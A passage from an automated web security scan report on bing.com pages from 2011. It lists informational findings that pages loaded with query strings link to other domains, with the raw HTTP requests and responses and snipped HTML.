<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,38.1')">Hotmail</a>
...[SNIP]...
</a><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661414&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252fdefault.aspx%253fFORM%253dMSNNAV&lc=1033&id=264960" onclick="if(VEShell.Passport.FrontDoorLinkHandler)return(VEShell.Passport.FrontDoorLinkHandler(arguments[0]));return true;" onmousedown="return si_T('&ID=FD,9.1')">Sign in</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,49.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,51.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,53.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,55.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,57.1')">About our ads</a>
...[SNIP]...

17.225. http://www.bing.com/maps/explore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/explore/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9

The response contains the following links to other domains:

http://mail.live.com/
http://www.msn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661417&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252fexplore%252f%253forg%253daj%2526FORM%253dZ9LH9&lc=1033&id=264960

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43791
Content-Type: text/html; charset=utf-8
X-Ve-Server: 01404
X-AspNet-Version: 2.0.50727
X-BM-Srv: CPKM001404
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:37 GMT
Connection: close
Set-Cookie: slpreview=1; path=/maps
Set-Cookie: _SS=SID=8DADF1D644F34854A1E8CA7C9D9B5D46; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:36 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7082098a8b034a49aac0ad240992ac06; expires=Fri, 01-Feb-2013 15:43:36 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,38.1')">Hotmail</a>
...[SNIP]...
</a><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661417&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252fexplore%252f%253forg%253daj%2526FORM%253dZ9LH9&lc=1033&id=264960" onclick="if(FrontDoorLinkHandler)return(FrontDoorLinkHandler(arguments[0]));return true;" onmousedown="return si_T('&ID=FD,9.1')">Sign in</a>
...[SNIP]...

17.226. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/news/search?q=groundhog+day+2011&FORM=msnhpm

The response contains the following links to other domains:

http://abcnews.go.com/Video/playerIndex?id=12820171
http://advertising.microsoft.com/advertise-on-bing
http://azstarnet.com/news/national/article_7da8d16b-7ccc-5109-8bcd-7fe5e10d4876.html
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx
http://today.msnbc.msn.com/id/41384041
http://video.ap.org/?f=AP&pid=AY2eqC2E_ZQ_NatJ1jYLWKzHCif6Us4K
http://video.ap.org/?f=AP&pid=SqzbbacowVTQk3mw67_JaOaSpV57R0cS
http://video.ap.org/?f=AP&pid=ZUTN1dyInZIU8a2AWLBeWn1ty7tuOBUA
http://voices.washingtonpost.com/compost/2011/02/groundhog_day_2011_results_spr.html
http://www.aolnews.com/2011/01/31/groundhog-day-2011-meet-punxsutawney-phils-rivals/
http://www.associatedcontent.com/article/7707283/groundhog_day_2011_to_let_punxsutawney.html
http://www.associatedcontent.com/article/7710742/did_the_groundhog_see_his_shadow_in.html
http://www.betus.com/sports-betting/nfl-football/articles/groundhog-day-2011-winners-2011-02-02/
http://www.breitbart.com/article.php?id=cp_iibieuhjt29&show_article=1
http://www.cbsnews.com/video/watch/?id=7309575n
http://www.cnn.com/video/?/video/us/2011/02/02/am.groundhog.shadow.cnn
http://www.dailytribune.com/articles/2011/02/02/news/doc4d49523a016df104369001.txt
http://www.examiner.com/headlines-in-providence/snowfall-totals-groundhog-day-2011-snowstorm-update-ri-weather-forecast
http://www.examiner.com/tech-buzz-in-providence/groundhog-day-2011-badge-on-foursquare-check-on-february-2
http://www.foxnews.com/opinion/2011/02/02/businessmen-say-happy-birthday-ayn-rand/
http://www.guardian.co.uk/environment/2011/feb/02/groundhog-day-spring-punxsutawney-phil
http://www.huffingtonpost.com/users/logout/?referer=%2F2011%2F02%2F02%2Fpunxsutawney-phil-predict_n_817345.html%3Fref%3Dfb%26src%3Dsp
http://www.manolith.com/2011/02/02/did-punxsutawney-phil-see-his-shadow-2011-find-out-now.../
http://www.moberlymonitor.com/news/x19211463/Groundhog-Day-how-much-more-winter?photo=0
http://www.msn.com/
http://www.news10.net/news/article.aspx?storyid=120888&provider=top&catid=188
http://www.nola.com/newsflash/index.ssf/story/nyc-groundhog-chuck-spring-is-in-sight/f5a174135c484830a6b33344fa386469
http://www.nola.com/weather/index.ssf/2011/02/groundhog_day_2011_punxsutawne.html
http://www.nola.com/weather/index.ssf/2011/02/groundhog_day_will_be_wintry_1.html
http://www.postchronicle.com/news/strange/article_212346640.shtml
http://www.prnewswire.com/news-releases/groundhog-day-in-pa-punxsutawney-phil-predicts-an-early-spring-115092134.html?cf_synd_id=zSHlK5W
http://www.saratogian.com/articles/2011/02/02/news/doc4d48eb333bac0312847633.txt?viewmode=fullstory
http://www.silive.com/northshore/index.ssf/2011/02/groundhog_day_2011_will_staten.html
http://www.suntimes.com/news/nation/3600253-460/punxsutawney-phil-groundhog-weather-125.html
http://www.upi.com/Odd_News/2011/01/29/NYC-mayor-hopes-for-good-Groundhog-Day/UPI-91061296348002/
http://www.volunteertv.com/home/headlines/Punxsutawney_Phil_fails_to_see_shadow_predicting_early_spring_in_125th_Groundhog_Day_forecast_115099869.html?storySection=story
https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchnews&P1=dsatnews&P2=groundhog+day+2011&P3=0&P4=msnhpm&P5=F741A5D3C8544F77A0B57D8439E7E06E&P6=Washington%2c+District+Of+Columbia&P7=Original&P8=&P9=38.9069%2f-77.0284&P10=24902&P11=&P12=&searchtype=News+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2fnews%2fsearch%3fq%3dgroundhog%2bday%2b2011%26FORM%3dFEEDTU
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661411&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dgroundhog%252bday%252b2011%2526FORM%253dmsnhpm%2526alert_showform%253d1&lc=1033&id=264960

Request

GET /news/search?q=groundhog+day+2011&FORM=msnhpm HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 77988
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:31 GMT
Connection: close
Set-Cookie: _SS=SID=99448538E4834041B5E696C5C2A48894; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c6ee58e942b5b4c779756cc3e93047321; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,199.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,201.1')">Hotmail</a>
...[SNIP]...
<p class="SignInLink">To sign up for news alerts, you need to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661411&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dgroundhog%252bday%252b2011%2526FORM%253dmsnhpm%2526alert_showform%253d1&lc=1033&id=264960" onmousedown="return si_T('&ID=news,987.1')">sign in</a>
...[SNIP]...
<p class="SignUpLink">Don't have a Windows Live ID? <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661411&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dgroundhog%252bday%252b2011%2526FORM%253dmsnhpm%2526alert_showform%253d1&lc=1033&id=264960" onmousedown="return si_T('&ID=news,987.2')">Sign up</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=news,690.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=news,692.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=news,694.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=news,696.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=news,698.1')">About our ads</a>
...[SNIP]...
<div class="sn_img"><a href="http://www.moberlymonitor.com/news/x19211463/Groundhog-Day-how-much-more-winter?photo=0" onmousedown="return si_T('&ID=news,55.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fwww.moberlymonitor.com%2farchive%2fx896129674%2fg2e22e2000000000000e1feb0b870aa228cd5e00259b1361353bb4d7e61.jpg&id=9F6C847A146
...[SNIP]...
<div class="sn_hd"><a href="http://www.associatedcontent.com/article/7710742/did_the_groundhog_see_his_shadow_in.html" onmousedown="return si_T('&ID=news,48.1')" >Did the <strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.manolith.com/2011/02/02/did-punxsutawney-phil-see-his-shadow-2011-find-out-now%e2%80%a6/" onmousedown="return si_T('&ID=news,50.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.breitbart.com/article.php?id=cp_iibieuhjt29&show_article=1" onmousedown="return si_T('&ID=news,52.1')" >Severe weather for <strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.silive.com/northshore/index.ssf/2011/02/groundhog_day_2011_will_staten.html" onmousedown="return si_T('&ID=news,69.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fmedia.silive.com%2fadvance%2fphoto%2f9240134-large.jpg&id=D3446A590BE3C8DBF147A93DD99502AD" title="Groundhog Day 2011: Will St
...[SNIP]...
<div class="sn_hd"><a href="http://www.aolnews.com/2011/01/31/groundhog-day-2011-meet-punxsutawney-phils-rivals/" onmousedown="return si_T('&ID=news,62.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.upi.com/Odd_News/2011/01/29/NYC-mayor-hopes-for-good-Groundhog-Day/UPI-91061296348002/" onmousedown="return si_T('&ID=news,64.1')" >NYC mayor hopes for good <strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.nola.com/newsflash/index.ssf/story/nyc-groundhog-chuck-spring-is-in-sight/f5a174135c484830a6b33344fa386469" onmousedown="return si_T('&ID=news,66.1')" >NYC <strong>
...[SNIP]...
<div class="sn_img"><a href="http://today.msnbc.msn.com/id/41384041" onmousedown="return si_T('&ID=news,82.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fmsnbcmedia3.msn.com%2fj%2fMSNBC%2fComponents%2fPhoto%2f_new%2f110202-groundhog-hmed-345a.grid-6x2.jpg&id=A85C75C0229099787D96A
...[SNIP]...
<div class="sn_hd"><a href="http://www.huffingtonpost.com/users/logout/?referer=%2F2011%2F02%2F02%2Fpunxsutawney-phil-predict_n_817345.html%3Fref%3Dfb%26src%3Dsp" onmousedown="return si_T('&ID=news,76.1')" >Punxsutawney Phil <strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.news10.net/news/article.aspx?storyid=120888&provider=top&catid=188" onmousedown="return si_T('&ID=news,78.1')" >Punxsutawney Phil doesn't see his shadow; early spring predicted on <strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.volunteertv.com/home/headlines/Punxsutawney_Phil_fails_to_see_shadow_predicting_early_spring_in_125th_Groundhog_Day_forecast_115099869.html?storySection=story" onmousedown="return si_T('&ID=news,80.1')" >Punxsutawney Phil fails to see shadow, predicting early spring in 125th <strong>
...[SNIP]...
<span class="vt_con"><a href="http://www.cbsnews.com/video/watch/?id=7309575n" onmousedown="return si_T('&ID=news,91.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts4.mm.bing.net\/videos\/thumbnail.aspx?q=3054013519&bid=T4wItgKvETU%2bfQ&bn=MotionThumb&url=http%3a%2f%2fwww.cbsnews.com%2fvideo%2fwatch%2f%3fid%3d7309575n', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://www.cbsnews.com/video/watch/?id=7309575n" onmousedown="return si_T('&ID=news,91.2')">Punxsutawney Phil Predicts ...</a>
...[SNIP]...
<span class="vt_con"><a href="http://www.cnn.com/video/?/video/us/2011/02/02/am.groundhog.shadow.cnn" onmousedown="return si_T('&ID=news,94.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts3.mm.bing.net\/videos\/thumbnail.aspx?q=4292881746&bid=Ui3g%2f4LY4xjssw&bn=MotionThumb&url=http%3a%2f%2fwww.cnn.com%2fvideo%2f%3f%2fvideo%2fus%2f2011%2f02%2f02%2fam.groundhog.shadow.cnn', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://www.cnn.com/video/?/video/us/2011/02/02/am.groundhog.shadow.cnn" onmousedown="return si_T('&ID=news,94.2')">Groundhog says spring is coming</a>
...[SNIP]...
<span class="vt_con"><a href="http://video.ap.org/?f=AP&pid=SqzbbacowVTQk3mw67_JaOaSpV57R0cS" onmousedown="return si_T('&ID=news,96.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts3.mm.bing.net\/videos\/thumbnail.aspx?q=3614992442&bid=Omh418DOlQ%2bjNw&bn=MotionThumb&url=http%3a%2f%2fvideo.ap.org%2f%3ff%3dAP%26pid%3dSqzbbacowVTQk3mw67_JaOaSpV57R0cS', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://video.ap.org/?f=AP&pid=SqzbbacowVTQk3mw67_JaOaSpV57R0cS" onmousedown="return si_T('&ID=news,96.2')">Raw Video: Punxsutawney Phil ...</a>
...[SNIP]...
<span class="vt_con"><a href="http://video.ap.org/?f=AP&pid=AY2eqC2E_ZQ_NatJ1jYLWKzHCif6Us4K" onmousedown="return si_T('&ID=news,99.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts1.mm.bing.net\/videos\/thumbnail.aspx?q=2107174932&bid=FPCYfYo8pRgSnQ&bn=MotionThumb&url=http%3a%2f%2fvideo.ap.org%2f%3ff%3dAP%26pid%3dAY2eqC2E_ZQ_NatJ1jYLWKzHCif6Us4K', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://video.ap.org/?f=AP&pid=AY2eqC2E_ZQ_NatJ1jYLWKzHCif6Us4K" onmousedown="return si_T('&ID=news,99.2')">Punxsutawney Preps for Ground ...</a>
...[SNIP]...
<span class="vt_con"><a href="http://abcnews.go.com/Video/playerIndex?id=12820171" onmousedown="return si_T('&ID=news,102.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts3.mm.bing.net\/videos\/thumbnail.aspx?q=1334401678&bid=jlqJT6dyj8wDsw&bn=MotionThumb&url=http%3a%2f%2fabcnews.go.com%2fVideo%2fplayerIndex%3fid%3d12820171', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://abcnews.go.com/Video/playerIndex?id=12820171" onmousedown="return si_T('&ID=news,102.2')">It's Groundhog Day! What Did ...</a>
...[SNIP]...
<span class="vt_con"><a href="http://video.ap.org/?f=AP&pid=ZUTN1dyInZIU8a2AWLBeWn1ty7tuOBUA" onmousedown="return si_T('&ID=news,105.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts4.mm.bing.net\/videos\/thumbnail.aspx?q=2946924643&bid=Y4Cmr3BsLT6Leg&bn=MotionThumb&url=http%3a%2f%2fvideo.ap.org%2f%3ff%3dAP%26pid%3dZUTN1dyInZIU8a2AWLBeWn1ty7tuOBUA', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://video.ap.org/?f=AP&pid=ZUTN1dyInZIU8a2AWLBeWn1ty7tuOBUA" onmousedown="return si_T('&ID=news,105.2')">Raw Video: a Foot of Snow in ...</a>
...[SNIP]...
<div class="sn_img"><a href="http://www.nola.com/weather/index.ssf/2011/02/groundhog_day_will_be_wintry_1.html" onmousedown="return si_T('&ID=news,115.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fmedia.nola.com%2fweather_impact%2fphoto%2f9239670-large.jpg&id=0A6FE0E6785C7DAFAA0E234EF1193A33" title="Groundhog Day 2011 wil
...[SNIP]...
<div class="sn_hd"><a href="http://www.saratogian.com/articles/2011/02/02/news/doc4d48eb333bac0312847633.txt?viewmode=fullstory" onmousedown="return si_T('&ID=news,108.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.suntimes.com/news/nation/3600253-460/punxsutawney-phil-groundhog-weather-125.html" onmousedown="return si_T('&ID=news,110.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://azstarnet.com/news/national/article_7da8d16b-7ccc-5109-8bcd-7fe5e10d4876.html" onmousedown="return si_T('&ID=news,112.1')" >Weather note to Phil: Just stay in your burrow</a>
...[SNIP]...
<div class="sn_hd"><a href="http://voices.washingtonpost.com/compost/2011/02/groundhog_day_2011_results_spr.html" onmousedown="return si_T('&ID=news,122.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.nola.com/weather/index.ssf/2011/02/groundhog_day_2011_punxsutawne.html" onmousedown="return si_T('&ID=news,127.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fmedia.nola.com%2fweather_impact%2fphoto%2f9243935-large.jpg&id=5C54C4CF0B6438958288AFB40C9A19D4" title="Groundhog Day 2011: Pu
...[SNIP]...
<div class="sn_hd"><a href="http://www.nola.com/weather/index.ssf/2011/02/groundhog_day_2011_punxsutawne.html" onmousedown="return si_T('&ID=news,126.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.postchronicle.com/news/strange/article_212346640.shtml" onmousedown="return si_T('&ID=news,132.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fwww.postchronicle.com%2fimages%2farticles%2fgroundhog_day_001.jpg&id=5FAA1A8D7279B28FA5A988DB20828F6E" title="Groundhog Day: W
...[SNIP]...
<div class="sn_hd"><a href="http://www.postchronicle.com/news/strange/article_212346640.shtml" onmousedown="return si_T('&ID=news,131.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.examiner.com/headlines-in-providence/snowfall-totals-groundhog-day-2011-snowstorm-update-ri-weather-forecast" onmousedown="return si_T('&ID=news,137.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fwww.examiner.com%2fsites%2fdefault%2ffiles%2fstyles%2flarge%2fhash%2fGroundhog%2520Day%25202011%2520Snowstorm%2520Feb%25202.jpg&am
...[SNIP]...
<div class="sn_hd"><a href="http://www.examiner.com/headlines-in-providence/snowfall-totals-groundhog-day-2011-snowstorm-update-ri-weather-forecast" onmousedown="return si_T('&ID=news,136.1')" >Snowfall totals, <strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.associatedcontent.com/article/7707283/groundhog_day_2011_to_let_punxsutawney.html" onmousedown="return si_T('&ID=news,141.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.examiner.com/tech-buzz-in-providence/groundhog-day-2011-badge-on-foursquare-check-on-february-2" onmousedown="return si_T('&ID=news,146.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fcdn2-b.examiner.com%2fsites%2fdefault%2ffiles%2fstyles%2flarge%2fhash%2f01%2f7f%2fhog_0.jpg&id=1B5AD7EF0B25AC44D67A99B98636C26
...[SNIP]...
<div class="sn_hd"><a href="http://www.examiner.com/tech-buzz-in-providence/groundhog-day-2011-badge-on-foursquare-check-on-february-2" onmousedown="return si_T('&ID=news,145.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.guardian.co.uk/environment/2011/feb/02/groundhog-day-spring-punxsutawney-phil" onmousedown="return si_T('&ID=news,3.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.betus.com/sports-betting/nfl-football/articles/groundhog-day-2011-winners-2011-02-02/" onmousedown="return si_T('&ID=news,8.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.prnewswire.com/news-releases/groundhog-day-in-pa-punxsutawney-phil-predicts-an-early-spring-115092134.html?cf_synd_id=zSHlK5W" onmousedown="return si_T('&ID=news,12.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.foxnews.com/opinion/2011/02/02/businessmen-say-happy-birthday-ayn-rand/" onmousedown="return si_T('&ID=news,16.1')" >Forget <strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.dailytribune.com/articles/2011/02/02/news/doc4d49523a016df104369001.txt" onmousedown="return si_T('&ID=news,20.1')" >Who ya gonna believe? Punxsutawney Phil or Woody the woodchuck?</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,213.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,215.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,217.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,219.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,221.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,223.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchnews&P1=dsatnews&P2=groundhog+day+2011&P3=0&P4=msnhpm&P5=F741A5D3C8544F77A0B57D8439E7E06E&P6=Washington%2c+District+Of+Columbia&P7=Original&P8=&P9=38.9069%2f-77.0284&P10=24902&P11=&P12=&searchtype=News+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2fnews%2fsearch%3fq%3dgroundhog%2bday%2b2011%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&ID=FD,225.1')">Tell us what you think</a>
...[SNIP]...

17.227. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/news/search?q=small+plane+makes+emergency+landing+on+nj+highway&form=msnhpm

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://ksax.com/article/stories/S1951677.shtml?cat=10230
http://mail.live.com/
http://news.yahoo.com/s/nm/20110131/us_nm/us_plane_highway
http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx
http://video.ap.org/?f=AP&pid=OnzT_rGa6m76FSGTFEEGhVvVG_HIoePH
http://www.cbsnews.com/8301-503544_162-20030276-503544.html
http://www.cbsnews.com/video/watch/?id=7305553n
http://www.cnn.com/video/?/video/us/2011/01/31/vo.nj.plane.towed.news12
http://www.cnn.com/video/?/video/us/2011/01/31/vosil.nj.plane.on.interstate.80.wabc
http://www.courierpostonline.com/article/20110131/NEWS02/110131070/Small-plane-makes-emergency-landing-on-N-J-highway
http://www.dbtechno.com/curiosity/2011/02/01/plan-makes-emergency-landing-on-new-jersey-highway-due-to-mechanical-issues/
http://www.dbtechno.com/uncategorized/2011/02/01/chicago-midwest-prepare-for-snow-storm/
http://www.gather.com/viewArticle.action?articleId=281474979005490
http://www.gather.com/viewArticle.action?articleId=281474979008340
http://www.msn.com/
http://www.msnbc.msn.com/id/41356396
http://www.nj.com/news/index.ssf/2011/01/small_plane_headed_for_teterbo.html
http://www.northjersey.com/news/business/stocks020111.html
http://www.postchronicle.com/news/breakingnews/article_212346591.shtml
http://www.reuters.com/news/video?videoId=183717816
http://www.thaindian.com/newsportal/business/citigroup-acquires-emi-and-reduces-debt-by-65-percent_100496945.html
http://www.whec.com/news/stories/S1951718.shtml?cat=566
http://www.wpix.com/news/wpix-reports-of-plane-landing-on-nj-highway,0,312021.story
https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchnews&P1=dsatnews&P2=small+plane+makes+emergency+landing+on+nj+highway&P3=0&P4=msnhpm&P5=F741A5D3C8544F77A0B57D8439E7E06E&P6=Washington%2c+District+Of+Columbia&P7=Original&P8=&P9=38.9069%2f-77.0284&P10=24902&P11=&P12=&searchtype=News+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2fnews%2fsearch%3fq%3dsmall%2bplane%2bmakes%2bemergency%2blanding%2bon%2bnj%2bhighway%26FORM%3dFEEDTU
